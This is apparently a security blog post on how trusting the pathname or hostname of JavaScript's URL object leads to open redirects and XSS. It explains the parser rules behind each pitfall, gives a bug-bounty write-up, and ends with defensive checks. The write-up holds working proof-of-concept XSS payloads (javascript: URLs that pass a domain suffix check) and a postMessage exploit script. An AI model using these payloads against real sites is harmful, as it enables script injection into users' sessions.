Claims
new URL(userControlled).pathnameis not safe to feed intolocation.href. For special schemes (http,https,ws,wss,ftp,file) it can start with//and turn into an open redirect. For non-special schemes it can start withjavascript:and turn into XSS.- The
.hostnameof aURLis also not safe to allowlist against, because browsers happily parsejavascript://...stuff...evil.cominto a "URL" whose hostname ends in your trusted domain. - Both behaviors come straight from the WHATWG URL Standard. Browsers are doing the spec-conformant thing. The bugs are in the application code.
- The
URLAPI looks like a sanitizer and, if done right, it can be a sanitizer, but it comes with a few footguns.
What started this
I saw this Critical Thinking Podcast short that pointed out a javascript: URL parsed by new URL() can end up with a hostname attribute. This is kind of weird. Turns out there seems to be a lot of code on the web where devs rely on attributes of URL-parsed objects for validating user-controlled data and there is more than one way this can lead to problems. I will explore two of them here.
Extra slashes in special URLs
This is a standard pattern and looks fine on first read:
// redirect client to the path of a given URL
const userControlledURL = new URL(userControlled)
location.href = userControlledURL.pathname
You would expect the code to just pull out the path, so even if userControlled is something like https://evil.com/foo, the code will navigate to /foo on the current origin. Reasonable.
But:
(new URL("https://nice.com//evil.com")).pathname
// -> "//evil.com"
If userControlled === "https://nice.com//evil.com", the snippet above sets location.href = "//evil.com", which the browser resolves as a protocol-relative URL, straight to https://evil.com. Open redirect.
The browser treats / as a path-segment separator inside path state. The relevant rule, paraphrased: "if c is /, then terminate the current path segment." (the same is true for \ by the way).
So tracing https://nice.com//evil.com through the parser: after https://nice.com is consumed, path state runs with c = / and an empty buffer. Special URL, c is / → terminate the (empty) segment. Path is now [""]. Then it reads evil.com into the buffer, end-of-input flushes it. Final path: ["", "evil.com"]. The serializer joins with / and prefixes one, giving "//evil.com".
For https: URIs the path is guaranteed to start with a /. That doesn't save you here: //evil.com also starts with /.
It gets worse with custom schemes
For non-special schemes, if the scheme isn't followed by //, the parser goes straight to path state and the pathname gets no leading /:
(new URL("bla:javascript:alert(1)")).pathname
// -> "javascript:alert(1)"
So if userControlled === "bla:javascript:alert(1)" and the same redirect snippet runs:
location.href = "javascript:alert(1)"
XSS!
Quick write-up of a real-world bug bounty finding
Back to the initial observation that javascript: URLs can have non-falsey .hostname/.host attributes. After learning that, I went back to a target with a web message handler that I had looked at before but didn't manage to exploit. The vulnerable code was a message handler that looked roughly like this:
window.addEventListener("message", (event) => {
let data = event.data;
if (data?.event_type === "NAVIGATE") {
try {
let t = new URL(data.href);
if (
t.hostname.endsWith(".target.com")
) {
router.push(data.href);
}
} catch {}
}
});
Two things going wrong:
- No
event.origincheck on the message itself. - As pointed out:
.hostnameof a parsed URL is not what you think it is when the URL has a non-special scheme.
To get a .hostname, the string still has to start with [SCHEME]://.... This is possible with a functioning XSS payload. To check this yourself, try this in the DevTools console:
> let url = new URL("javascript://%0aconsole.log('pwned')%2f%2f.example.com/")
> url.hostname
"%0aconsole.log('pwned')%2f%2f.example.com"
> url.host
"%0aconsole.log('pwned')%2f%2f.example.com"
> window.location = url.href
// pwned
This is the WHATWG behavior: the spec lets non-special URLs carry an authority. So the exploit:
const win = window.open("https://www.target.com/")
await new Promise(r => setTimeout(r, 600)) // wait for load
win.postMessage({
"event_type": "NAVIGATE",
"href": "javascript://%0aalert(document.domain)%2f%2f.target.com/"
}, "*")
new URL(data.href) parses, .hostname is %0aalert(document.domain)%2f%2f.target.com (and therefore ends with .target.com), suffix check passes. router.push(data.href) runs with the same string, the browser navigates to a javascript: URL, and:
%0adecodes to a newline, terminating the JS comment that the//openedalert(document.domain)runs on the next line//.target.com/is a trailing comment
Wrapping up
Going back to the claims at the top: URL can be used as a sanitizer, but only if you check the scheme first. Without that check, .pathname, .hostname, .host are just components of the parse result, and what those components mean depends entirely on the scheme. Two vectors discussed above are instances of the same mistake: trusting a component without first asking whether the scheme makes that component meaningful:
.pathnamelooks like a relative path, but for special URLs it can start with//(backslash trick), and for non-special URLs it can bejavascript:alert(1)(opaque path)..hostnamelooks like a hostname, but for non-special URLs it's whatever bytes the spec lets you stuff between//and the next path-terminating character.
A short list of things that are probably safe for redirect/allowlist code:
- Compare
parsed.origin === "https://your.exact.origin"and reject anything else. - Explicitly check
parsed.protocol === "https:"before doing anything withparsed.hostname. - If you want to redirect to a path, prefix it:
window.location = window.location.origin + "/" + parsed.pathname.substr(1).